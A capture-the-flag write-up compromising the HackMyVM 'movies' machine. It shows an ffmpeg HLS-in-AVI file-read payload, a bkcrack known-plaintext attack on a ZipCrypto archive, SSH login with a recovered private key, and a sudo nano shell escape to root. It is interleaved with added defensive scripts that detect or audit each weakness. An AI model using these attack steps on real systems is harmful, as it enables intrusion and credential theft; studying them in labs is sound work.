hack-my-vm-movies


Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.178.99                                                                                [18:49:18]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 18:49 CST
Nmap scan report for 192.168.178.99
Host is up (0.039s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:29:BB:50 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds
kali@kali [~] ➜  sudo nmap -sT -sC -sV -O -p22,80 192.168.178.99                                                                                 [18:49:49]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 18:50 CST
Nmap scan report for 192.168.178.99
Host is up (0.00068s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 e7:c1:40:66:c0:be:c8:86:dd:58:21:4a:03:76:78:12 (RSA)
| 256 86:9f:0d:8f:f1:e0:62:90:65:cf:79:ee:5e:e3:12:01 (ECDSA)
|_ 256 2a:e0:ac:89:49:dd:e5:3a:8f:47:36:7a:2f:07:11:b8 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: movie.hmv
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:29:BB:50 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds

Start with information gathering on port 80.

Port exploitation

kali@kali [~] ➜  dirb http://192.168.178.99                                                                                                      [18:50:25]

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Mar 23 18:51:28 2025
URL_BASE: http://192.168.178.99/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.178.99/ ----
==> DIRECTORY: http://192.168.178.99/data/
==> DIRECTORY: http://192.168.178.99/dist/
+ http://192.168.178.99/index.php (CODE:200|SIZE:552)
+ http://192.168.178.99/server-status (CODE:403|SIZE:279)
+ http://192.168.178.99/sitemap.xml (CODE:200|SIZE:762)

---- Entering directory: http://192.168.178.99/data/ ----
==> DIRECTORY: http://192.168.178.99/data/dist/
+ http://192.168.178.99/data/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.178.99/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.178.99/data/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Mar 23 18:51:40 2025
DOWNLOADED: 9224 - FOUND: 4

Two directories found; scan each of them to see which files they contain:

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.178.99/data -x php,html  [18:53:07]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.178.99/data
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/login.php (Status: 200) [Size: 449]
/index.php (Status: 302) [Size: 0] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/config.php (Status: 200) [Size: 0]
/dist (Status: 301) [Size: 320] [--> http://192.168.178.99/data/dist/]
/404.html (Status: 200) [Size: 920]

The data directory gives us index.php and config.php; let's look at those first.

kali@kali [~] ➜  curl http://192.168.178.99/data/config.php                                                                                      [18:56:44]
kali@kali [~] ➜

That is an empty page, so let's look at the login page.

[Screenshot 1]

The login page has no SQL injection and no weak passwords; every attempt failed, so we set it aside for now and look at the other directory.

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.178.99/dist -x php,html  [18:49:17]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.178.99/dist
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/img (Status: 301) [Size: 319] [--> http://192.168.178.99/dist/img/]
/css (Status: 301) [Size: 319] [--> http://192.168.178.99/dist/css/]
/js (Status: 301) [Size: 318] [--> http://192.168.178.99/dist/js/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]

Nothing useful there, so back to the main page.

[Screenshot 2]

The only feature is an upload that accepts .avi files. The server is Linux and converts .avi to .mp4, which very likely means ffmpeg being invoked on the command line. We can therefore embed a payload in the AVI (an HLS playlist pointing at local files, which ffmpeg will follow during conversion) and turn the converter into an SSRF / local file read. The tool is SSRF-Testing/ffmpeg/gen_avi.py at master · cujanovic/SSRF-Testing.

kali@kali [~/Desktop] ➜  python gen_avi.py file:///etc/passwd passwd.avi                                [19:09:09]
kali@kali [~/Desktop] ➜ cat passwd.avi [19:09:19]
RIFFAVI LISThdrlavih8@�}��LISTtstrlstrh8txts}�'��strf((��XVIDHLIST movi00tx�GAB2#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1.0,
#EXT-X-BYTERANGE: 0
file:////usr/share/doc/gnupg/Upgrading_From_PGP.txt
#EXTINF:1.0,
file:///etc/passwd
#EXT-X-ENDLIST00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd%

As the dump shows, our playlist is embedded in the file; now we just upload it.
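From the defender's side, the upload above is detectable before it ever reaches ffmpeg: a video upload should not carry a text (subtitle) stream, and no legitimate AVI chunk contains an HLS playlist or a `file:` URI. The following is an added example, not code from the writeup or from the SSRF-Testing project; it walks the RIFF chunk tree of an uploaded file and rejects anything shaped like the gen_avi.py output. The `build_avi` helper, `inspect_avi`, and both sample files are constructed here for the demonstration.

```python
"""Server-side pre-check for uploaded AVI files before they are handed to ffmpeg.

Walks the RIFF chunk tree and flags (a) stream headers that are not audio/video
and (b) chunk payloads carrying an HLS playlist or a URI scheme ffmpeg would
follow. The sample files below are constructed to mirror the gen_avi.py layout.
"""
import struct

M3U_MARKER = b"#EXTM3U"
# URI schemes an embedded playlist could point ffmpeg at; deliberately conservative.
RISKY_SCHEMES = (b"file:", b"http:", b"https:", b"ftp:", b"concat:", b"subfile:", b"tcp:", b"udp:")
ALLOWED_STREAMS = {b"vids", b"auds"}  # stream types a video upload may legitimately contain


def _chunk(fourcc, payload):
    """Encode one RIFF chunk: fourcc, little-endian size, payload, pad to even length."""
    data = fourcc + struct.pack("<I", len(payload)) + payload
    return data + (b"\x00" if len(payload) & 1 else b"")


def _list(list_type, body):
    return _chunk(b"LIST", list_type + body)


def build_avi(stream_type, movi_body):
    """Constructed minimal AVI: hdrl (avih + one strl) followed by a movi list."""
    strh = _chunk(b"strh", stream_type + b"\x00" * 52)  # fccType is the first field of strh
    strf = _chunk(b"strf", b"\x00" * 40)
    hdrl = _list(b"hdrl", _chunk(b"avih", b"\x00" * 56) + _list(b"strl", strh + strf))
    body = b"AVI " + hdrl + _list(b"movi", movi_body)
    return b"RIFF" + struct.pack("<I", len(body)) + body


def _walk(buf, start, end, report):
    pos = start
    while pos + 8 <= end:
        fourcc = buf[pos:pos + 4]
        size = struct.unpack_from("<I", buf, pos + 4)[0]
        dstart = pos + 8
        dend = min(dstart + size, end)  # clamp oversized declared lengths to the buffer
        if fourcc == b"LIST":
            _walk(buf, dstart + 4, dend, report)  # skip the 4-byte list type, recurse
        else:
            payload = buf[dstart:dend]
            if fourcc == b"strh" and len(payload) >= 4:
                report["streams"].append(payload[:4])
            if M3U_MARKER in payload:
                report["findings"].append(f"HLS playlist marker in chunk {fourcc!r}")
            for scheme in RISKY_SCHEMES:
                if scheme in payload:
                    report["findings"].append(f"URI scheme {scheme.decode()} in chunk {fourcc!r}")
        pos = dend + (size & 1)  # chunks are word-aligned


def inspect_avi(buf):
    """Return {'accept': bool, 'streams': [...], 'findings': [...]} for an uploaded file."""
    report = {"accept": False, "streams": [], "findings": []}
    if len(buf) < 12 or buf[:4] != b"RIFF" or buf[8:12] != b"AVI ":
        report["findings"].append("not a RIFF/AVI container")
        return report
    _walk(buf, 12, len(buf), report)
    for stream_type in report["streams"]:
        if stream_type not in ALLOWED_STREAMS:
            report["findings"].append(f"unexpected stream type {stream_type!r}")
    report["accept"] = not report["findings"] and bool(report["streams"])
    return report


# Constructed samples: a video-only AVI, and one shaped like the gen_avi.py output
# (a 'txts' stream whose movi chunk carries a GAB2 header and an HLS playlist).
BENIGN_AVI = build_avi(b"vids", _chunk(b"00dc", b"\x00" * 16))
PLAYLIST = b"#EXTM3U\n#EXTINF:1.0,\nfile:///etc/passwd\n#EXT-X-ENDLIST\n"
MALICIOUS_AVI = build_avi(b"txts", _chunk(b"00tx", b"GAB2\x00" + PLAYLIST))

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_AVI), ("playlist", MALICIOUS_AVI)):
        print(label, inspect_avi(sample))
```

The check is a gate, not a parser you would trust for playback: it clamps bad chunk sizes instead of failing, and it treats any non audio/video stream as grounds for rejection, which is the right default for a converter that only promises .avi to .mp4.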

[Screenshot 3]

The upload has to be of the type shown above; then we download the returned MP4 and open it.

[Screenshot 4]

That gives us a username. I remember there was also a configuration file earlier, config.php, so we repeat the same trick for it.

[Screenshot 5]

With the credentials in hand I tried logging in over SSH, without result, so the only option left was the login page we found earlier. Clicking "click me" there downloaded an archive.

kali@kali [~] ➜  7z x mydata_archive.zip                                                                [19:20:32]

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit locale=zh_CN.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 7731 bytes (8 KiB)

Extracting archive: mydata_archive.zip
--
Path = mydata_archive.zip
Type = zip
Physical Size = 7731


Would you like to replace the existing file:
Path: ./404.html
Size: 919 bytes (1 KiB)
Modified: 2022-09-28 14:09:09
with the file from archive:
Path: 404.html
Size: 919 bytes (1 KiB)
Modified: 2022-09-28 14:09:09
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y


Enter password (will not be echoed):

Extraction asks for a password, so let's list the files inside first.

kali@kali [~] ➜  7z l mydata_archive.zip                                                                [19:21:39]


7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit locale=zh_CN.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 7731 bytes (8 KiB)

Listing archive: mydata_archive.zip

--
Path = mydata_archive.zip
Type = zip
Physical Size = 7731

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2022-09-28 14:09:09 ..... 919 931 404.html
2022-10-01 14:53:29 ..... 552 564 home.html
2022-09-25 20:59:17 ..... 2602 2614 id_rsa
2022-09-30 14:10:26 ..... 143 155 index.php
2022-10-01 14:59:12 ..... 762 774 sitemap.xml
2022-10-01 14:24:29 ..... 1881 1893 upload.php
------------------- ----- ------------ ------------ ------------------------
2022-10-01 14:59:12 6859 6931 6 files

There is a private key, plus some HTML files.

kali@kali [~] ➜  7z l -slt mydata_archive.zip | grep "^Method ="                                        [19:22:42]

Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store

Every entry uses the same method, ZipCrypto with Store, and ZipCrypto is vulnerable to a known-plaintext attack: we only need to know a portion of one file's contents. An HTML file is the obvious choice, since it has a fixed header. The attack tool: https://github.com/kimci86/bkcrack/releases/download/v1.5.0/bkcrack-1.5.0-Linux.tar.gz

kali@kali [~] ➜  echo -n '<!DOCTYPE html>' > x   

Do not include a trailing newline.
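The weakness exploited here is visible in the archive's own headers, which is where a defender can catch it: general-purpose flag bit 0 set with no AES method means legacy ZipCrypto, and a Store method means the known plaintext lines up byte for byte with the encrypted stream, which is why fifteen bytes of `<!DOCTYPE html>` were enough. The following is an added example, not part of the writeup or of bkcrack; `classify`, `audit_zip`, and the hand-built `build_zip` sample writer are constructed for this demonstration, and the sample archive's entry names and contents are made up.

```python
"""Audit the encryption method of every entry in a zip archive.

Legacy ZipCrypto (general-purpose flag bit 0 set, no AES marker method) is what
known-plaintext attacks such as bkcrack target; entries that are also stored
(method 0) expose their plaintext layout directly in the encrypted stream.
"""
import io
import struct
import zipfile
import zlib

METHOD_STORE = 0
METHOD_AES = 99          # WinZip AE-x marker method
FLAG_ENCRYPTED = 0x0001  # general-purpose bit 0
FLAG_STRONG = 0x0040     # PKWARE "strong encryption" bit


def classify(info):
    """Name the encryption scheme of a ZipInfo, or None when the entry is unencrypted."""
    if not info.flag_bits & FLAG_ENCRYPTED:
        return None
    if info.compress_type == METHOD_AES:
        return "AES"
    if info.flag_bits & FLAG_STRONG:
        return "PKWARE-strong"
    return "ZipCrypto"


def audit_zip(buf):
    """Return one dict per entry: name, scheme, stored, weak."""
    rows = []
    with zipfile.ZipFile(io.BytesIO(buf)) as zf:
        for info in zf.infolist():
            scheme = classify(info)
            rows.append({
                "name": info.filename,
                "scheme": scheme,
                "stored": info.compress_type == METHOD_STORE,
                # ZipCrypto is weak regardless; Store additionally makes plaintext trivial to align
                "weak": scheme == "ZipCrypto",
            })
    return rows


def weak_entries(buf):
    return [row["name"] for row in audit_zip(buf) if row["weak"]]


def build_zip(entries):
    """Constructed minimal zip writer: one (name, data, flag_bits, method) tuple per entry.
    Payload bytes are written as given; only the headers matter for the audit."""
    local, central = b"", b""
    for name, data, flags, method in entries:
        nameb, crc, offset = name.encode(), zlib.crc32(data) & 0xFFFFFFFF, len(local)
        # local file header (30 bytes) + name + data
        local += struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, 0, 0,
                             crc, len(data), len(data), len(nameb), 0) + nameb + data
        # central directory header (46 bytes) + name
        central += struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method,
                               0, 0, crc, len(data), len(data), len(nameb),
                               0, 0, 0, 0, 0, offset) + nameb
    # end of central directory record (22 bytes)
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, len(entries), len(entries),
                       len(central), len(local), 0)
    return local + central + eocd


# Constructed sample archive: a ZipCrypto+Store entry (the case on this box), an AES
# entry, and an unencrypted entry. Encrypted payloads are placeholder bytes.
SAMPLE_ZIP = build_zip([
    ("404.html", b"\x00" * 27, FLAG_ENCRYPTED, METHOD_STORE),
    ("notes.txt", b"\x00" * 40, FLAG_ENCRYPTED, METHOD_AES),
    ("plain.txt", b"hello\n", 0, METHOD_STORE),
])

if __name__ == "__main__":
    for row in audit_zip(SAMPLE_ZIP):
        print(row)
```

Running `audit_zip` over `mydata_archive.zip` would report every entry as ZipCrypto and stored, the same thing `7z l -slt` shows as `Method = ZipCrypto Store`; an archive meant to protect an SSH private key should show AES instead.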

kali@kali [~] ➜  xxd x                                                                                  [19:25:16]
00000000: 3c21 444f 4354 5950 4520 6874 6d6c 3e <!DOCTYPE html>
kali@kali [~] ➜ 7z a x.zip x [19:26:55]

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit locale=zh_CN.UTF-8 Threads:128 OPEN_MAX:1024

Open archive: x.zip
--
Path = x.zip
Type = zip
Physical Size = 151

Scanning the drive:
1 file, 15 bytes (1 KiB)

Updating archive: x.zip

Add new data to archive: 1 file, 15 bytes (1 KiB)


Files read from disk: 1
Archive size: 151 bytes (1 KiB)
Everything is Ok
kali@kali [~] ➜  ./Desktop/bkcrack-1.5.0-Linux/bkcrack -C mydata_archive.zip -c 404.html -P x.zip -p x  [19:27:26]
bkcrack 1.5.0 - 2022-07-07
[19:28:19] Z reduction using 8 bytes of known plaintext
100.0 % (8 / 8)
[19:28:20] Attack on 761980 Z values at index 6
Keys: d706e724 da372a68 a79864b0
0.8 % (6048 / 761980)
[19:28:31] Keys
d706e724 da372a68 a79864b0
kali@kali [~] ➜ ./Desktop/bkcrack-1.5.0-Linux/bkcrack -C mydata_archive.zip -k d706e724 da372a68 a79864b0 -U rock.zip 123
bkcrack 1.5.0 - 2022-07-07
[19:28:47] Writing unlocked archive rock.zip with password "123"
100.0 % (6 / 6)
Wrote unlocked archive.
kali@kali [~] ➜ 7z x rock.zip  

Enter the password we set, 123, and the archive extracts.

kali@kali [~] ➜  ssh -i id_rsa  tarantino@192.168.178.99                                                [19:29:36]
Linux movie.hmv 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 23 11:15:05 2025 from 192.168.178.141
tarantino@movie:~$

tarantino@movie:~$ sudo -l
Matching Defaults entries for tarantino on movie:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tarantino may run the following commands on movie:
(root) NOPASSWD: /usr/bin/nano /etc/passwd
sudo /usr/bin/nano /etc/passwd
^R^X
reset; sh 1>&0 2>&0

Privilege escalation is simple, but my attempt to write a new user into /etc/passwd did not succeed.
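The root cause on this box is the sudoers rule itself: granting `nano /etc/passwd` as root is granting root, because nano (like vi, less and other interactive tools) can execute a command from inside the editor, which is exactly what the `^R^X` sequence above does. The following is an added example, not part of the writeup; `parse_rule` and `audit_sudoers` are constructed here to scan sudoers user-specification lines for this class of rule, and the sample sudoers fragment is made up apart from the tarantino line, which reproduces the rule found on the machine.

```python
"""Audit sudoers user-specification lines for rules that amount to a root shell.

A rule like "(root) NOPASSWD: /usr/bin/nano /etc/passwd" is only nominally an
edit permission: nano, vi, less and similar tools can spawn a command from
inside the program. sudoedit is the intended way to let a user edit one file
without running an editor as root.
"""
import re

# Interactive editors/pagers with a documented command or shell escape.
SHELL_ESCAPE_BINARIES = {"nano", "vi", "vim", "view", "less", "more", "man", "ed"}

# user  HOST=(runas) [TAG:] command [args]
RULE_RE = re.compile(
    r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def parse_rule(line):
    """Parse one sudoers user-spec line; returns None for comments, Defaults and aliases."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or stripped.startswith("Defaults"):
        return None
    if re.match(r"^(User|Host|Cmnd|Runas)_Alias\b", stripped):
        return None
    m = RULE_RE.match(stripped)
    if not m:
        return None
    tags = {t.strip(": ") for t in re.findall(r"[A-Z]+:", m.group("tags"))}
    cmd = m.group("cmd").strip()
    return {
        "user": m.group("user"),
        "runas": (m.group("runas") or "root").strip(),  # sudo defaults to root when omitted
        "nopasswd": "NOPASSWD" in tags,
        "command": cmd,
        "binary": cmd.split()[0].rsplit("/", 1)[-1],
    }


def audit_sudoers(text):
    """Return (user, command, reason) for every rule that is effectively a root shell."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        if rule["command"] == "ALL":
            findings.append((rule["user"], rule["command"], "unrestricted ALL"))
        elif rule["binary"] in SHELL_ESCAPE_BINARIES:
            findings.append((rule["user"], rule["command"],
                             f"{rule['binary']} can run commands from inside the editor; "
                             "use sudoedit for file edits"))
    return findings


# Constructed sample sudoers fragment; the tarantino line reproduces the rule seen on the box.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
# User privilege specification
root    ALL=(ALL:ALL) ALL
tarantino ALL=(root) NOPASSWD: /usr/bin/nano /etc/passwd
deploy  ALL=(root) NOPASSWD: sudoedit /etc/passwd
ops     ALL=(root) /usr/sbin/reboot
"""

if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} -> {reason}")
```

The `deploy` line shows the fix for this box: `sudoedit /etc/passwd` copies the file to a temporary location, runs the user's editor unprivileged, and writes the result back as root, so an editor escape only yields the invoking user's own shell.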